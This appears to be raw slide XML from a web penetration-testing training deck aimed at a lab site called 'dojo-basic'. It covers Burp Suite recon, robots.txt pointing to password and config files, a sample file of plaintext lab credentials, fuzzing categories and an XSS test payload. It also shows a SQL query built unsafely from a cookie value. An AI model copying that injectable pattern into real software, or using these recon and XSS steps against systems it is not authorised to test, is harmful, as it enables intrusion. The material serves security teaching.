                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BF737F6-0DEE-1F44-808C-D4AC2C2474A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If using paid version of Burp Suite you can right click on a host in the tree and select Engagement Tools:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find comments, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find Scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For the community version manually view the responses or use curl and grep to look for comment strings </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look for useful information about the application, users, resources, network, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="350047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171394-846D-E845-AD6F-8292A2C80F78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="115746" y="2708476"/>
            <a:ext cx="4224759" cy="2054023"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!-- Old username query for welcome message before move to base64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uids</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$query  = "SELECT * FROM accounts WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='".$_COOKIE["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"].”’”; --&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!-- Check to see if admin is logged in and only show admin tool section if true --&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2491567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5804-C317-164E-8D8D-F3F50626BB57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browse Interesting files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D784125-DA58-BD4E-AF48-A2A8D533064E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>View Target-&gt; Site Map for interesting pages to look at</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using the Repeater tool or by looking at the robots response:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>User-agent: *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Disallow: ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Disallow: ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>config.inc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using the Repeater tool or by looking at the passwords/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>accounts.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> response:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>', '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>adminpass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>', 'Monkey!!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>adrian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>', </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>somepassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>', 'Zombie Films Rock!!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>john</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>', </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>monkey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>', 'I like the smell of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>confunk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>', '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>', '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Commandline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>KungFu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> anyone?'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4230252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1ACF-A38D-414D-8442-1070C12F7437}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Config.inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{702BF35E-D354-9F4F-836A-1FC4F6083812}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Navigate to: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://dojo-basic/config.inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or edit path in Repeater (won’t show in site map)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note that nothing is displayed on the page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In Burp Suite view the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>config.inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> response </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66A753F0-910A-2446-8B0A-9A53041D1336}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2511706"/>
            <a:ext cx="7734300" cy="2974428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3503499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5EA8-B636-974D-A88A-8025D8675408}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fuzzing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3650AAC-09A1-2746-B463-88802C1D2136}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A technique that involves providing invalid, unexpected or random data as input to a web application, form, or computer program.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB20121C-E56A-464E-B394-76C43F5CE398}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2695027458"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="817944" y="2115820"/>
          <a:ext cx="7716456" cy="2865120"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3858228">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="13202448"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3858228">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4192580472"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Minimum/maximum length of input data</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Directory Traversal</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3039496623"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Invalid data type</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Type juggling</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3982959792"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Injecting JS, HTML, CSS</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>HTTP Methods</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="338982096"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>SQL Injections</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Spoofing headers: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>referer</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>, user-agent, cookie, x-forwarded-for, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>etc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3224847820"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Command Injections</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>URL parameter manipulation</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3792906020"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Authentication bypass</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Permission bypass</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1718128617"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>File uploads, executing macros</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Page navigation – LFI/RFI</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3535227573"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35665702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25DF-0B9C-0740-88A6-F1C7A52EAC51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{219B6EC2-D382-A842-BA86-8171554C7E92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> code to be ran inside the browser, injected by outside party. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Persistent XSS is stored in a database, file or cache.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reflective XSS is not stored within in the application but is reflected back into the web application. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DOM XSS injected into the DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;script&gt;alert(“XSS Test”)&lt;/script&gt;</a:t>
